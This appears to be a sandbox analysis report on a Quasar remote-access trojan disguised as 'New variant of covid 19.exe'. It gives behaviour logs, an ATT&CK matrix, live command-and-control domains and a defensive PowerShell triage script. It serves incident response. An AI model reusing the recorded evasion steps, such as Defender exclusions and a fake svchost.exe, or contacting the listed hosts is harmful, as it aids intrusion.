      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Users\user\Desktop\New variant of covid 19.exe VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: svchost.exe, 0000001D.00000002.740199179.000001D409C3D000.00000004.00000001.sdmp | Binary or memory string: $@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000001D.00000002.740420286.000001D409D02000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Quasar RAT
Source: Yara match | File source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
Source: Yara match | File source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\Public\Documents\sfTrQxoCTFZPN

Remote Access Functionality:

Yara detected Quasar RAT
Source: Yara match | File source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
Source: Yara match | File source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The original is a 14-column matrix with one column per tactic; it is listed here column by column. Digits in parentheses after a technique are the signature-count badges of the original cell, reproduced exactly as extracted. Techniques without a badge are the matrix's unmatched placeholders.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: DLL Side-Loading (1); Process Injection (212); Registry Run Keys / Startup Folder (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Disable or Modify Tools (21); Obfuscated Files or Information (1); Timestomp (1); DLL Side-Loading (1); Masquerading (111); Virtualization/Sandbox Evasion (25); Process Injection (212); Hidden Files and Directories (1); Masquerading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (11); System Information Discovery (22); Query Registry (1); Security Software Discovery (151); Virtualization/Sandbox Evasion (25); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Graph ID: 365752 | Sample: New variant of covid 19.exe | Start date: 09/03/2021 | Architecture: WINDOWS | Score: 100

Legend of the original graph (icons, not reproducible in text): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, language marker (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language), Is malicious, Internet.

Root (node 2): DNS devils.shacknet.us | signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Yara detected Quasar RAT; 9 other signatures

Process tree as drawn in the graph. Node numbers are in brackets; the digits after a process name are the graph's created-file / created-registry-value counters, reproduced as extracted.

New variant of covid 19.exe [9] 17 11
    network: liverpoolofcfanclub.com 104.21.31.39, ports 49710, 49720, 49727 (CLOUDFLARENETUS, United States)
    dropped: C:\Users\Public\Documents\...\svchost.exe (PE32); C:\Users\...\svchost.exe:Zone.Identifier (ASCII)
    signatures: Adds a directory exclusion to Windows Defender; Hides threads from debuggers; Injects a PE file into a foreign processes
    -> New variant of covid 19.exe [20] 2
        network: ip-api.com 208.95.112.1, ports 49715, 80 (TUT-ASUS, United States); devils.shacknet.us 103.28.70.164, ports 4782, 49717, 49718 (HVC-ASUS, United States)
        signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
    -> cmd.exe [24] 1
        -> conhost.exe [34]
        -> timeout.exe [36] 1
    -> powershell.exe [26] 26
        -> conhost.exe [38]
    -> WerFault.exe [28] 9
explorer.exe [14]
    -> svchost.exe [30]
        network: liverpoolofcfanclub.com
        signatures: Adds a directory exclusion to Windows Defender; Tries to delay execution (extensive OutputDebugStringW loop); Hides threads from debuggers
        -> cmd.exe [40]
            -> conhost.exe [46]
            -> timeout.exe [48]
        -> powershell.exe [42]
            -> conhost.exe [50]
        -> svchost.exe [44]
explorer.exe [16]
    -> svchost.exe [32]
        network: liverpoolofcfanclub.com
        signatures: System process connects to network (likely due to code injection or exploit); Injects a PE file into a foreign processes
13 other processes [18]
    network: 127.0.0.1 (unknown); 192.168.2.1 (unknown)
    signatures: Changes security center settings (notifications, updates, antivirus, firewall)
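The ROOT\SecurityCenter2 enumeration recorded in the "Lowering of HIPS / PFW / Operating System Security Settings" section, the Defender directory exclusion, the svchost.exe dropped under C:\Users\Public\Documents and started by explorer.exe, the stripped Zone.Identifier stream and the session to devils.shacknet.us on port 4782 are all things a responder can re-check on a live host. The script below is an added triage example written for this page; it is not part of the Joe Sandbox report and not Quasar code. It assumes an elevated PowerShell 5.1+ session on the host under examination; $DropRoot, $C2Port and the function names are mine, the random sub-folder name (sfTrQxoCTFZPN in the sandbox run) is not assumed because it differs per infection, and the productState decoding is the commonly documented bit layout rather than anything the report states.

```powershell
# Added triage script for a host suspected of this Quasar infection.
# Not part of the Joe Sandbox report and not Quasar code.
# Assumptions: elevated PowerShell 5.1 or later; $DropRoot is the drop
# location from the report (the random sub-folder differs per infection,
# so the tree is searched); $C2Port is the port the report lists for
# devils.shacknet.us.

$DropRoot = 'C:\Users\Public\Documents'
$C2Port   = 4782

# 1. The same ROOT\SecurityCenter2 enumeration the report records.
#    productState is decoded with the commonly documented layout
#    (assumption, not from the report): bit 0x1000 = real-time protection
#    on, bit 0x0010 = signatures out of date.
function Get-SecurityCenterState {
    foreach ($cls in 'AntiVirusProduct', 'FirewallProduct', 'AntiSpywareProduct') {
        Get-CimInstance -Namespace 'ROOT\SecurityCenter2' -ClassName $cls -ErrorAction SilentlyContinue |
            ForEach-Object {
                $state = [int]$_.productState
                [pscustomobject]@{
                    Class     = $cls
                    Product   = $_.displayName
                    Enabled   = (($state -band 0x1000) -ne 0)
                    OutOfDate = (($state -band 0x0010) -ne 0)
                }
            }
    }
}

# 2. Defender path exclusions that cover the drop directory or sit inside it
#    ("Adds a directory exclusion to Windows Defender" in the report).
function Get-SuspiciousExclusions {
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if (-not $pref) { return }
    foreach ($ex in @($pref.ExclusionPath)) {
        if (-not $ex) { continue }
        if ($DropRoot -like "$($ex)*" -or $ex -like "$($DropRoot)*") {
            [pscustomobject]@{ Exclusion = $ex; Covers = $DropRoot }
        }
    }
}

# 3. svchost.exe files under the drop root, plus running svchost.exe whose
#    image is outside System32/SysWOW64 ("Drops PE files with benign system
#    names"; the graph shows explorer.exe starting the dropped copy). Each
#    file is checked for a Zone.Identifier stream, which the report says the
#    sample strips from its drop.
function Find-RogueSvchost {
    $legit = '^C:\\Windows\\(System32|SysWOW64)\\svchost\.exe$'
    Get-ChildItem -Path $DropRoot -Recurse -Force -Filter 'svchost.exe' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $motw = Get-Item -LiteralPath $_.FullName -Stream 'Zone.Identifier' -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Kind      = 'File'
                Path      = $_.FullName
                HasZoneId = [bool]$motw
                Since     = $_.CreationTimeUtc
                Pid       = $null
            }
        }
    Get-Process -Name 'svchost' -ErrorAction SilentlyContinue |
        Where-Object { $_.Path -and ($_.Path -notmatch $legit) } |
        ForEach-Object {
            [pscustomobject]@{
                Kind      = 'Process'
                Path      = $_.Path
                HasZoneId = $null
                Since     = $_.StartTime.ToUniversalTime()
                Pid       = $_.Id
            }
        }
}

# 4. Established TCP sessions to the C2 port, with the owning image.
function Get-C2Connections {
    Get-NetTCPConnection -RemotePort $C2Port -State Established -ErrorAction SilentlyContinue |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Remote = "$($_.RemoteAddress):$($_.RemotePort)"
                Pid    = $_.OwningProcess
                Image  = $proc.Path
            }
        }
}

Get-SecurityCenterState  | Format-Table -AutoSize
Get-SuspiciousExclusions | Format-Table -AutoSize
Find-RogueSvchost        | Format-Table -AutoSize
Get-C2Connections        | Format-Table -AutoSize
```

Two caveats when reading the output. The report attributes the SecurityCenter2 queries to C:\Windows\System32\svchost.exe, which is also where the legitimate Security Center service lives, so step 1 is a state check rather than proof of RAT activity on its own; the exclusion, the misplaced svchost.exe and the port-4782 session are the stronger indicators. Step 3 only sees process paths it has rights to read, which is why the script assumes an elevated session; and a missing Zone.Identifier stream on a file that was never downloaded is normal, so treat HasZoneId as corroboration, not as a verdict. Port 4782 is the default port of the Quasar server, a fact about Quasar rather than something the report states.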

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

Source | Detection | Scanner | Label
10.2.New variant of covid 19.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1135947

      Domains

Source | Detection | Scanner
liverpoolofcfanclub.com | 8% | Virustotal
devils.shacknet.us | 10% | Virustotal

      URLs

Source | Detection | Scanner | Label
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | Avira URL Cloud | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | Avira URL Cloud | safe
